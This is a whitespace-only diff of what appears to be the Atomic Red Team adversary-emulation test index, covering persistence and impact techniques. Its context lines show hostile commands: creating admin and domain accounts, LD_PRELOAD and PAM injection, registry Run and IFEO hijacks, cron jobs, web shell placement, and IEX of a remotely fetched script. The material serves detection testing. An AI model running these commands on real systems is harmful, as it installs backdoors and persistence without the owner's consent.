technique:
type: attack-pattern
@@ -46293,7 +46293,7 @@ persistence:
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
-'
+ '
name: powershell
T1554:
technique:
@@ -46402,7 +46402,7 @@ persistence:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -46413,17 +46413,17 @@ persistence:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get cronjobs -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: CreateCronjob
@@ -46435,7 +46435,7 @@ persistence:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -46446,20 +46446,20 @@ persistence:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
-'
+ '
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1136:
@@ -46649,7 +46649,7 @@ persistence:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
-'
+ '
supported_platforms:
- macos
- linux
@@ -46669,7 +46669,7 @@ persistence:
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
-'
+ '
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -46677,7 +46677,7 @@ persistence:
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
-'
+ '
supported_platforms:
- macos
- linux
@@ -46709,7 +46709,7 @@ persistence:
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -46726,10 +46726,10 @@ persistence:
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
T1574.001:
technique:
object_marking_refs:
@@ -46904,10 +46904,10 @@ persistence:
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
-'
+ '
prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -46915,7 +46915,7 @@ persistence:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
-'
+ '
name: command_prompt
T1078.001:
technique:
@@ -47035,7 +47035,7 @@ persistence:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47046,10 +47046,10 @@ persistence:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1136.002:
@@ -47101,7 +47101,7 @@ persistence:
auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
description: 'Creates a new domain admin user in a command prompt.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47123,14 +47123,14 @@ persistence:
net group "#{group}" "#{username}" /add /domain
cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
-'
+ '
name: command_prompt
elevation_required: false
- name: Create a new account similar to ANONYMOUS LOGON
auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47145,10 +47145,10 @@ persistence:
executor:
command: 'net user "#{username}" "#{password}" /add /domain
-'
+ '
cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
-'
+ '
name: command_prompt
elevation_required: false
- name: Create a new Domain Account using PowerShell
@@ -47156,7 +47156,7 @@ persistence:
description: 'Creates a new Domain User using the credentials of the Current
User
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47185,7 +47185,7 @@ persistence:
$User
cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"
-'
+ '
name: powershell
elevation_required: false
T1078.002:
@@ -47565,21 +47565,21 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
-'
+ '
cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
-'
+ '
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
@@ -47604,18 +47604,18 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
-'
+ '
name: bash
T1546.014:
technique:
@@ -47676,7 +47676,7 @@ persistence:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -47988,7 +47988,7 @@ persistence:
description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
please see "T1133\src\list of vpn extension.txt" to view complete list
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -48001,12 +48001,12 @@ persistence:
type: String
default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
-'
+ '
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
@@ -48307,7 +48307,7 @@ persistence:
auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -48323,19 +48323,19 @@ persistence:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
-'
+ '
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: IFEO Global Flags
auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -48532,7 +48532,7 @@ persistence:
description: 'This test uses the insmod command to load a kernel module for
Linux.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -48556,10 +48556,10 @@ persistence:
dependencies:
- description: 'The kernel module must exist on disk at specified location
-'
+ '
prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{module_source_path}/* #{temp_folder}/
@@ -48568,7 +48568,7 @@ persistence:
executor:
command: 'sudo insmod #{module_path}
-'
+ '
cleanup_command: |
sudo rmmod #{module_name}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -48780,7 +48780,7 @@ persistence:
auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
description: 'Create a plist and execute it
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -48797,15 +48797,15 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -48903,7 +48903,7 @@ persistence:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: 'Utilize LaunchDaemon to launch `Hello World`
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -48920,15 +48920,15 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -49089,7 +49089,7 @@ persistence:
auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
description: 'Create a user via useradd
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -49100,17 +49100,17 @@ persistence:
executor:
command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
-'
+ '
cleanup_command: 'userdel #{username}
-'
+ '
name: bash
elevation_required: true
- name: Create a user account on a MacOS system
auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2'
description: 'Creates a user on a MacOS system with dscl
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -49132,7 +49132,7 @@ persistence:
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
cleanup_command: 'dscl . -delete /Users/#{username}
-'
+ '
name: bash
elevation_required: true
- name: Create a new user in a command prompt
@@ -49154,10 +49154,10 @@ persistence:
executor:
command: 'net user /add "#{username}" "#{password}"
-'
+ '
cleanup_command: 'net user /del "#{username}" >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Create a new user in PowerShell
@@ -49175,10 +49175,10 @@ persistence:
executor:
command: 'New-LocalUser -Name "#{username}" -NoPassword
-'
+ '
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Create a new user in Linux with `root` UID and GID.
@@ -49186,7 +49186,7 @@ persistence:
description: 'Creates a new user in Linux and adds the user to the `root` group.
This technique was used by adversaries during the Butter attack campaign.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -49204,14 +49204,14 @@ persistence:
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
cleanup_command: 'userdel #{username}
-'
+ '
name: bash
elevation_required: true
- name: Create a new Windows admin user
auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
description: 'Creates a new admin user in a command prompt.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -49229,7 +49229,7 @@ persistence:
net localgroup administrators "#{username}" /add
cleanup_command: 'net user /del "#{username}" >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1078.003:
@@ -49477,7 +49477,7 @@ persistence:
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
description: 'Mac logon script
-'
+ '
supported_platforms:
- macos
executor:
@@ -49706,7 +49706,7 @@ persistence:
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -49717,7 +49717,7 @@ persistence:
executor:
command: 'netsh.exe add helper #{helper_file}
-'
+ '
name: command_prompt
T1556.004:
technique:
@@ -50086,11 +50086,11 @@ persistence:
command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
/t REG_SZ /d "#{thing_to_execute}"
-'
+ '
cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office
test\Special\Perf" /f >nul 2>&1
-'
+ '
name: command_prompt
T1137.003:
technique:
@@ -50225,11 +50225,11 @@ persistence:
command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
/v URL /t REG_SZ /d #{url} /f
-'
+ '
cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
/v URL /f >nul 2>&1
-'
+ '
T1137.005:
technique:
object_marking_refs:
@@ -50356,7 +50356,7 @@ persistence:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -50369,14 +50369,14 @@ persistence:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
-'
+ '
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
-'
+ '
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -50774,7 +50774,7 @@ persistence:
auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
description: 'Modify MacOS plist file in one of two directories
-'
+ '
supported_platforms:
- macos
executor:
@@ -50881,10 +50881,10 @@ persistence:
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
@@ -50918,35 +50918,35 @@ persistence:
- description: 'The PAM development library must be installed to build the PAM
module
-'
+ '
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
-'
+ '
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
-'
+ '
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
-'
+ '
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
-'
+ '
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
T1205.001:
technique:
object_marking_refs:
@@ -51079,11 +51079,11 @@ persistence:
command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
/v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
-'
+ '
cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1546.013:
@@ -51169,7 +51169,7 @@ persistence:
profile pofile that points to a malicious executable. Upon execution, calc.exe
will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -51185,13 +51185,13 @@ persistence:
dependencies:
- description: 'Ensure a powershell profile exists for the current user
-'
+ '
prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
-'
+ '
executor:
command: |
Add-Content #{ps_profile} -Value ""
@@ -51409,14 +51409,14 @@ persistence:
command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
World"'' >> /etc/rc.common
-'
+ '
elevation_required: true
name: bash
- name: rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
description: 'Modify rc.common
-'
+ '
supported_platforms:
- linux
executor:
@@ -51432,12 +51432,12 @@ persistence:
];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
&& sudo rm $origfilename;fi
-'
+ '
- name: rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
description: 'Modify rc.local
-'
+ '
supported_platforms:
- linux
executor:
@@ -51453,7 +51453,7 @@ persistence:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
-'
+ '
T1542.004:
technique:
type: attack-pattern
@@ -51579,10 +51579,10 @@ persistence:
executor:
command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
-'
+ '
cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
-'
+ '
elevation_required: true
name: sh
T1108:
@@ -51777,11 +51777,11 @@ persistence:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Reg Key RunOnce
auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -51799,11 +51799,11 @@ persistence:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: PowerShell Registry RunOnce
@@ -51829,7 +51829,7 @@ persistence:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Suspicious vbs file run from startup Folder
@@ -51943,7 +51943,7 @@ persistence:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1505.001:
technique:
@@ -52088,10 +52088,10 @@ persistence:
~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys;
fi;
-'
+ '
cleanup_command: 'unset ssh_authorized_keys
-'
+ '
T1053.005:
technique:
type: attack-pattern
@@ -52189,7 +52189,7 @@ persistence:
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -52206,10 +52206,10 @@ persistence:
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
-'
+ '
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
@@ -52245,11 +52245,11 @@ persistence:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
-'
+ '
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
@@ -52271,7 +52271,7 @@ persistence:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
-'
+ '
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
@@ -52288,7 +52288,7 @@ persistence:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -52299,7 +52299,7 @@ persistence:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -52312,7 +52312,7 @@ persistence:
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
-'
+ '
supported_platforms:
- windows
executor:
@@ -52324,7 +52324,7 @@ persistence:
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
-'
+ '
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
@@ -52482,7 +52482,7 @@ persistence:
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -52797,7 +52797,7 @@ persistence:
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -52817,22 +52817,22 @@ persistence:
dependencies:
- description: 'The service must exist (#{weak_service_name})
-'
+ '
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
-'
+ '
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
-'
+ '
cleanup_command: 'sc.exe delete #{weak_service_name}
-'
+ '
name: command_prompt
T1547.009:
technique:
@@ -52905,7 +52905,7 @@ persistence:
#{shortcut_file_path}
cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
-'
+ '
name: command_prompt
- name: Create shortcut to cmd in startup folders
auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -53006,10 +53006,10 @@ persistence:
executor:
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
-'
+ '
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
-'
+ '
name: sh
elevation_required: true
T1542.001:
@@ -53186,7 +53186,7 @@ persistence:
description: 'This test creates a Systemd service unit file and enables it as
a service.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -53259,15 +53259,15 @@ persistence:
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
-'
+ '
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
-'
+ '
executor:
name: bash
elevation_required: true
@@ -53424,20 +53424,20 @@ persistence:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
@@ -53454,20 +53454,20 @@ persistence:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
@@ -53769,13 +53769,13 @@ persistence:
dependencies:
- description: 'Microsoft Exchange SnapIn must be installed
-'
+ '
prereq_command: 'Get-TransportAgent -TransportService FrontEnd
-'
+ '
get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
-'
+ '
executor:
command: |
Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}
@@ -53992,7 +53992,7 @@ persistence:
auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
description: 'Adds a command to the .bash_profile file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -54004,16 +54004,16 @@ persistence:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
-'
+ '
name: sh
- name: Add command to .bashrc
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
description: 'Adds a command to the .bashrc file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -54025,10 +54025,10 @@ persistence:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
-'
+ '
name: sh
T1078:
technique:
@@ -54206,10 +54206,10 @@ persistence:
dependencies:
- description: 'Web shell must exist on disk at specified location (#{web_shells})
-'
+ '
prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
@@ -54218,7 +54218,7 @@ persistence:
executor:
command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
-'
+ '
cleanup_command: |
del #{web_shell_path}\b.jsp /q >nul 2>&1
del #{web_shell_path}\tests.jsp /q >nul 2>&1
@@ -54491,10 +54491,10 @@ persistence:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -54527,10 +54527,10 @@ persistence:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -54656,11 +54656,11 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Winlogon Userinit Key Persistence - PowerShell
auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -54679,11 +54679,11 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Winlogon Notify Key Logon Persistence - PowerShell
auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -54705,7 +54705,7 @@ persistence:
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1547.013:
technique:
@@ -54849,7 +54849,7 @@ impact:
net.exe user #{user_account} #{new_password}
cleanup_command: 'net.exe user #{user_account} /delete >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Delete User - Windows
@@ -54857,7 +54857,7 @@ impact:
description: 'Deletes a user account to prevent access. Upon execution, run
the command "net user" to verify that the new "AtomicUser" account was deleted.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -54879,21 +54879,21 @@ impact:
auto_generated_guid: 43f71395-6c37-498e-ab17-897d814a0947
description: 'This test will remove an account from the domain admins group
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Requires the Active Directory module for powershell to be installed.
-'
+ '
prereq_command: 'if(Get-Module -ListAvailable -Name ActiveDirectory) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
-'
+ '
input_arguments:
super_user:
description: Account used to run the execution command (must include domain).
@@ -55137,10 +55137,10 @@ impact:
- description: 'Secure delete tool from Sysinternals must exist on disk at specified
location (#{sdelete_exe})
-'
+ '
prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
